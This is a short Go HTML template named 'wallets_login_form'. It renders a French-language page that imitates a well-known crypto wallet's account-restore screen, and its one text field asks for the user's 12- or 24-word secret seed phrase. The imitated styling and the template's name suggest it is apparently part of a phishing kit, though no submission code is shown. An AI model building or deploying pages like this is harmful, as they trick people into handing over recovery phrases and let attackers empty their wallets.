{{ define "wallets_login_form" }}<!DOCTYPE html><html lang="en">
  {{ template "head" .PageTitle }}
  <body>
  <div id="app-content" class="dark">
  {{ template "header" .PageTitle }}

  <div class="app mouse-user-styles">
    <div class="main-container-wrapper">
      <div class="first-view-main-wrapper">
        <div class="first-view-main">
          <div class="import-account">
            <a class="import-account__back-button" href="#">&lt; Back</a>
            <div class="import-account__title">Restaurer votre compte avec une phrase Seed.</div>
            <div class="import-account__selector-label">Saisissez votre phrase secrète de 12 ou 24 mots pour restaurer votre coffre-fort.</div>
            <div class="import-account__input-wrapper">
              <label class="import-account__input-label">Wallet Seed</label><textarea class="import-account__secret-phrase" placeholder="Separez chaque mot avec un espace simple"></textarea>
            </div>
            <button class="button btn--first-time first-time-flow__button" >Restaurer</button>
          </div>
        </div>
      </div>
    </div>
  </div>
  {{ template "footer" }}
  </div>
</body>
</html>{{ end }}